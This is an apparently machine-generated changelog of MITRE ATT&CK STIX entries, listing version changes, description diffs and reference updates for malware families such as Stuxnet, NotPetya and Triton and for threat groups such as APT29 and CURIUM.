description[YiSpecter](https://attack.mitre.org/software/S0311) iOS malware that affects both jailbroken and non-jailbroken iOS devices. It is also unique because it abuses private APIs in the iOS system to implement functionality. (Citation: PaloAlto-YiSpecter)[YiSpecter](https://attack.mitre.org/software/S0311) is a family of iOS and Android malware, first detected in November 2014, targeting users in mainland China and Taiwan. [YiSpecter](https://attack.mitre.org/software/S0311) abuses private APIs in iOS to infect both jailbroken and non-jailbroken devices.(Citation: paloalto_yispecter_1015)
external_references[1]['source_name']YiSpecterpaloalto_yispecter_1015
external_references[1]['description'](Citation: PaloAlto-YiSpecter)Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.02.0
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'PaloAlto-YiSpecter', 'description': 'Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved January 20, 2017.', 'url': 'https://researchcenter.paloaltonetworks.com/2015/10/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/'}
Minor Version Changes

[S0432] Bread

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-10-14 14:42:53.609000+00:002023-04-21 18:53:30.817000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0322] HummingBad

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_aliases['HummingBad']
x_mitre_deprecatedFalse
external_referenceshttp://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-04-21 18:52:08.966000+00:00
external_references[1]['source_name']HummingBadArsTechnica-HummingBad
external_references[1]['description'](Citation: ArsTechnica-HummingBad)Dan Goodin. (2016, July 7). 10 million Android phones infected by all-powerful auto-rooting apps. Retrieved January 24, 2017.
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'ArsTechnica-HummingBad', 'description': 'Dan Goodin. (2016, July 7). 10 million Android phones infected by all-powerful auto-rooting apps. Retrieved January 24, 2017.', 'url': 'http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/'}
Patches

[S0655] BusyGasper

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 15:38:53.014000+00:002023-03-28 17:20:20.194000+00:00
x_mitre_attack_spec_version2.1.03.1.0

ics-attack

New Software

[S1072] Industroyer2

Current version: 1.0

Description: [Industroyer2](https://attack.mitre.org/software/S1072) is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in [Industroyer](https://attack.mitre.org/software/S0604). Security researchers assess that [Industroyer2](https://attack.mitre.org/software/S1072) was designed to cause impact to high-voltage electrical substations. The initial [Industroyer2](https://attack.mitre.org/software/S1072) sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022, however it was discovered before deploying, resulting in no impact.(Citation: Industroyer2 Blackhat ESET)

Minor Version Changes

[S0496] REvil

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-24 21:09:01.019000+00:002023-03-26 20:06:33.317000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[S0603] Stuxnet

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1[Stuxnet](https://attack.mitre.org/software/S0603) was the ft1[Stuxnet](https://attack.mitre.org/software/S0603) was the f
>irst publicly reported piece of malware to specifically targ>irst publicly reported piece of malware to specifically targ
>et industrial control systems devices. [Stuxnet](https://att>et industrial control systems devices. [Stuxnet](https://att
>ack.mitre.org/software/S0603) is a large and complex piece o>ack.mitre.org/software/S0603) is a large and complex piece o
>f malware that utilized multiple different behaviors includi>f malware that utilized multiple different behaviors includi
>ng multiple zero-day vulnerabilities, a sophisticated Window>ng multiple zero-day vulnerabilities, a sophisticated Window
>s rootkit, and network infection routines.(Citation: Symante>s rootkit, and network infection routines.(Citation: Nicolas
>c W.32 Stuxnet Dossier)(Citation: CISA ICS Advisory ICSA-10-> Falliere, Liam O Murchu, Eric Chien February 2011)(Citation
>272-01)(Citation: ESET Stuxnet Under the Microscope)(Citatio>: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet U
>n: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/softwa>nder the Microscope)(Citation: Langer Stuxnet) [Stuxnet](htt
>re/S0603) was discovered in 2010, with some components being>ps://attack.mitre.org/software/S0603) was discovered in 2010
> used as early as November 2008.(Citation: Symantec W.32 Stu>, with some components being used as early as November 2008.
>xnet Dossier)>(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien Febru
 >ary 2011) 
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 20:31:32.664000+00:002023-03-20 13:50:55.168000+00:00
description[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Symantec W.32 Stuxnet Dossier)[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
external_references[1]['description'](Citation: Symantec W.32 Stuxnet Dossier)(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
external_references[4]['source_name']Symantec W.32 Stuxnet DossierNicolas Falliere, Liam O Murchu, Eric Chien February 2011
external_references[4]['description']Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020.Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22
external_references[4]['url']https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdfhttps://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf
external_references[5]['description']Ralph Langner. (2013, November). Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.21.3
Patches

[S0608] Conficker

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-04-25 14:00:00.188000+00:002023-03-08 22:15:47.458000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[S0038] Duqu

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-04-25 14:00:00.188000+00:002023-03-08 22:17:50.971000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[S0605] EKANS

Current version: 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-11 14:00:00.188000+00:002023-03-08 22:04:48.834000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[S1045] INCONTROLLER

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Jimmy Wylie, Dragos, Inc.']
values_changed
STIX FieldOld valueNew Value
modified2022-10-18 16:49:51.348000+00:002023-03-17 16:23:24.812000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[S0607] KillDisk

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-11 14:00:00.188000+00:002023-03-08 22:13:42.357000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[S0372] LockerGoga

Current version: 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-23 21:22:58.477000+00:002023-03-08 22:03:50.370000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[S0368] NotPetya

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-04-25 14:00:00.188000+00:002023-03-08 22:11:21.842000+00:00
external_references[4]['source_name']PetrwrapNyetya
external_references[4]['description'](Citation: Talos Nyetya June 2017)(Citation: ESET Telebots June 2017)(Citation: Talos Nyetya June 2017)
external_references[5]['source_name']NyetyaPetrwrap
external_references[5]['description'](Citation: Talos Nyetya June 2017)(Citation: Talos Nyetya June 2017)(Citation: ESET Telebots June 2017)
external_references[6]['source_name']Talos Nyetya June 2017ESET Telebots June 2017
external_references[6]['description']Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019.Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020.
external_references[6]['url']https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.htmlhttps://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/
external_references[7]['source_name']US-CERT NotPetya 2017Talos Nyetya June 2017
external_references[7]['description']US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019.
external_references[7]['url']https://www.us-cert.gov/ncas/alerts/TA17-181Ahttps://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html
external_references[8]['source_name']ESET Telebots June 2017US District Court Indictment GRU Unit 74455 October 2020
external_references[8]['description']Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020.Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.
external_references[8]['url']https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/https://www.justice.gov/opa/press-release/file/1328521/download
external_references[9]['source_name']US District Court Indictment GRU Unit 74455 October 2020US-CERT NotPetya 2017
external_references[9]['description']Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.
external_references[9]['url']https://www.justice.gov/opa/press-release/file/1328521/downloadhttps://www.us-cert.gov/ncas/alerts/TA17-181A
x_mitre_attack_spec_version2.1.03.1.0

[S1009] Triton

Current version: 1.0


Old Description
New Description
t1[Triton](https://attack.mitre.org/software/S1009) is an attat1[Triton](https://attack.mitre.org/software/S1009) is an atta
>ck framework built to interact with Triconex Safety Instrume>ck framework built to interact with Triconex Safety Instrume
>nted System (SIS) controllers. (Citation: Blake Johnson, Dan>nted System (SIS) controllers.(Citation: Blake Johnson, Dan 
> Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christo>Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christop
>pher Glyer December 2017) (Citation: Dragos December 2017) (>her Glyer December 2017)(Citation: Dragos December 2017)(Cit
>Citation: DHS CISA February 2019) (Citation: Schneider Elect>ation: DHS CISA February 2019)(Citation: Schneider Electric 
>ric January 2018) (Citation: Julian Gutmanis March 2019) (Ci>January 2018)(Citation: Julian Gutmanis March 2019)(Citation
>tation: Schneider December 2018) (Citation: Jos Wetzels Janu>: Schneider December 2018)(Citation: Jos Wetzels January 201
>ary 2018)>8)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-12 18:29:38.831000+00:002022-11-23 14:27:54.711000+00:00
description[Triton](https://attack.mitre.org/software/S1009) is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers. (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) (Citation: Dragos December 2017) (Citation: DHS CISA February 2019) (Citation: Schneider Electric January 2018) (Citation: Julian Gutmanis March 2019) (Citation: Schneider December 2018) (Citation: Jos Wetzels January 2018)[Triton](https://attack.mitre.org/software/S1009) is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers.(Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017)(Citation: Dragos December 2017)(Citation: DHS CISA February 2019)(Citation: Schneider Electric January 2018)(Citation: Julian Gutmanis March 2019)(Citation: Schneider December 2018)(Citation: Jos Wetzels January 2018)
x_mitre_attack_spec_version2.1.03.0.0

[S0366] WannaCry

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-04-25 14:00:00.188000+00:002023-03-08 22:20:20.868000+00:00
external_references[1]['source_name']WanaCryWanaCrypt0r
external_references[1]['description'](Citation: SecureWorks WannaCry Analysis)(Citation: LogRhythm WannaCry)
external_references[2]['source_name']WanaCryptWCry
external_references[2]['description'](Citation: SecureWorks WannaCry Analysis)(Citation: LogRhythm WannaCry)(Citation: SecureWorks WannaCry Analysis)
external_references[3]['source_name']WanaCrypt0rWanaCry
external_references[3]['description'](Citation: LogRhythm WannaCry)(Citation: SecureWorks WannaCry Analysis)
external_references[4]['source_name']WCryWanaCrypt
external_references[4]['description'](Citation: LogRhythm WannaCry)(Citation: SecureWorks WannaCry Analysis)(Citation: SecureWorks WannaCry Analysis)
external_references[5]['source_name']LogRhythm WannaCryFireEye WannaCry 2017
external_references[5]['description']Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.
external_references[5]['url']https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html
external_references[6]['source_name']US-CERT WannaCry 2017SecureWorks WannaCry Analysis
external_references[6]['description']US-CERT. (2017, May 12). Alert (TA17-132A): Indicators Associated With WannaCry Ransomware. Retrieved March 25, 2019.Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.
external_references[6]['url']https://www.us-cert.gov/ncas/alerts/TA17-132Ahttps://www.secureworks.com/research/wcry-ransomware-analysis
external_references[8]['source_name']FireEye WannaCry 2017LogRhythm WannaCry
external_references[8]['description']Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.
external_references[8]['url']https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.htmlhttps://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/
external_references[9]['source_name']SecureWorks WannaCry AnalysisUS-CERT WannaCry 2017
external_references[9]['description']Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.US-CERT. (2017, May 12). Alert (TA17-132A): Indicators Associated With WannaCry Ransomware. Retrieved March 25, 2019.
external_references[9]['url']https://www.secureworks.com/research/wcry-ransomware-analysishttps://www.us-cert.gov/ncas/alerts/TA17-132A
x_mitre_attack_spec_version2.1.03.1.0

Groups

enterprise-attack

New Groups

[G1012] CURIUM

Current version: 1.0

Description: [CURIUM](https://attack.mitre.org/groups/G1012) is an Iranian threat group first reported in November 2021 that has invested in building a relationship with potential targets via social media over a period of months to establish trust and confidence before sending malware. Security researchers note [CURIUM](https://attack.mitre.org/groups/G1012) has demonstrated great patience and persistence by chatting with potential targets daily and sending benign files to help lower their security consciousness.(Citation: Microsoft Iranian Threat Actor Trends November 2021)


[G1014] LuminousMoth

Current version: 1.0

Description: [LuminousMoth](https://attack.mitre.org/groups/G1014) is a Chinese-speaking cyber espionage group that has been active since at least October 2020. [LuminousMoth](https://attack.mitre.org/groups/G1014) has targeted high-profile organizations, including government entities, in Myanmar, the Philippines, Thailand, and other parts of Southeast Asia. Some security researchers have concluded there is a connection between [LuminousMoth](https://attack.mitre.org/groups/G1014) and [Mustang Panda](https://attack.mitre.org/groups/G0129) based on similar targeting and TTPs, as well as network infrastructure overlaps.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)


[G1013] Metador

Current version: 1.0

Description: [Metador](https://attack.mitre.org/groups/G1013) is a suspected cyber espionage group that was first reported in September 2022. [Metador](https://attack.mitre.org/groups/G1013) has targeted a limited number of telecommunication companies, internet service providers, and universities in the Middle East and Africa. Security researchers named the group [Metador](https://attack.mitre.org/groups/G1013) based on the "I am meta" string in one of the group's malware samples and the expectation of Spanish-language responses from C2 servers.(Citation: SentinelLabs Metador Sept 2022)

Major Version Changes

[G0016] APT29

Current version: 4.0

Version changed from: 3.1 → 4.0


Old Description
New Description
t1[APT29](https://attack.mitre.org/groups/G0016) is threat grot1[APT29](https://attack.mitre.org/groups/G0016) is threat gro
>up that has been attributed to Russia's Foreign Intelligence>up that has been attributed to Russia's Foreign Intelligence
> Service (SVR).(Citation: White House Imposing Costs RU Gov > Service (SVR).(Citation: White House Imposing Costs RU Gov 
>April 2021)(Citation: UK Gov Malign RIS Activity April 2021)>April 2021)(Citation: UK Gov Malign RIS Activity April 2021)
> They have operated since at least 2008, often targeting gov> They have operated since at least 2008, often targeting gov
>ernment networks in Europe and NATO member countries, resear>ernment networks in Europe and NATO member countries, resear
>ch institutes, and think tanks. [APT29](https://attack.mitre>ch institutes, and think tanks. [APT29](https://attack.mitre
>.org/groups/G0016) reportedly compromised the Democratic Nat>.org/groups/G0016) reportedly compromised the Democratic Nat
>ional Committee starting in the summer of 2015.(Citation: F->ional Committee starting in the summer of 2015.(Citation: F-
>Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Cr>Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Cr
>owdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia >owdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia 
>SolarWinds April 2021)  In April 2021, the US and UK governm>SolarWinds April 2021)  In April 2021, the US and UK governm
>ents attributed the SolarWinds supply chain compromise cyber>ents attributed the [SolarWinds Compromise](https://attack.m
> operation to the SVR; public statements included citations >itre.org/campaigns/C0024) to the SVR; public statements incl
>to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear>uded citations to [APT29](https://attack.mitre.org/groups/G0
>, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds>016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory
> April 2021)(Citation: UK NSCS Russia SolarWinds April 2021)> SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWi
> Victims of this campaign included government, consulting, t>nds April 2021) Industry reporting also referred to the acto
>echnology, telecom, and other organizations in North America>rs involved in this campaign as UNC2452, NOBELIUM, StellarPa
>, Europe, Asia, and the Middle East. Industry reporting refe>rticle, Dark Halo, and SolarStorm.(Citation: FireEye SUNBURS
>rred to the actors involved in this campaign as UNC2452, NOB>T Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)
>ELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUN>(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citatio
>BURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2>n: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR
>021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Cit> TTP May 2021)(Citation: Unit 42 SolarStorm December 2020)
>ation: Volexity SolarWinds)(Citation: Cybersecurity Advisory 
> SVR TTP May 2021) 
Details
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
external_referenceshttps://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/
values_changed
STIX FieldOld valueNew Value
modified2022-07-11 20:34:55.717000+00:002023-04-16 22:25:01.191000+00:00
description[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021) In April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021) In April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Industry reporting also referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Unit 42 SolarStorm December 2020)
external_references[9]['source_name']IRON HEMLOCKBlue Kitsune
external_references[9]['description'](Citation: Secureworks IRON HEMLOCK Profile)(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)
external_references[10]['source_name']IRON RITUALIRON HEMLOCK
external_references[10]['description'](Citation: Secureworks IRON RITUAL Profile)(Citation: Secureworks IRON HEMLOCK Profile)
external_references[11]['source_name']NobleBaronIRON RITUAL
external_references[11]['description'](Citation: SentinelOne NobleBaron June 2021)(Citation: Secureworks IRON RITUAL Profile)
external_references[12]['source_name']Dark HaloNobleBaron
external_references[12]['description'](Citation: Volexity SolarWinds)(Citation: SentinelOne NobleBaron June 2021)
external_references[13]['source_name']Crowdstrike DNC June 2016SolarStorm
external_references[13]['description']Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.(Citation: Unit 42 SolarStorm December 2020)
external_references[14]['source_name']Volexity SolarWindsDark Halo
external_references[14]['description']Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.(Citation: Volexity SolarWinds)
external_references[15]['source_name']CrowdStrike SUNSPOT Implant January 2021Crowdstrike DNC June 2016
external_references[15]['description']CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
external_references[15]['url']https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
external_references[16]['source_name']CrowdStrike StellarParticle January 2022Volexity SolarWinds
external_references[16]['description']CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.
external_references[16]['url']https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/
external_references[17]['source_name']GRIZZLY STEPPE JARCrowdStrike SUNSPOT Implant January 2021
external_references[17]['description']Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.
external_references[17]['url']https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdfhttps://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/
external_references[18]['source_name']FireEye APT29 Nov 2018CrowdStrike StellarParticle January 2022
external_references[18]['description']Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.
external_references[18]['url']https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.htmlhttps://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/
external_references[19]['source_name']F-Secure The DukesGRIZZLY STEPPE JAR
external_references[19]['description']F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.
external_references[19]['url']https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdfhttps://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
external_references[20]['source_name']ESET Dukes October 2019FireEye APT29 Nov 2018
external_references[20]['description']Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.
external_references[20]['url']https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdfhttps://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html
external_references[21]['source_name']FireEye SUNBURST Backdoor December 2020F-Secure The Dukes
external_references[21]['description']FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.
external_references[21]['url']https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.htmlhttps://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf
external_references[22]['source_name']SentinelOne NobleBaron June 2021ESET Dukes October 2019
external_references[22]['description']Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.
external_references[22]['url']https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf
external_references[23]['source_name']Microsoft Unidentified Dec 2018FireEye SUNBURST Backdoor December 2020
external_references[23]['description']Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.
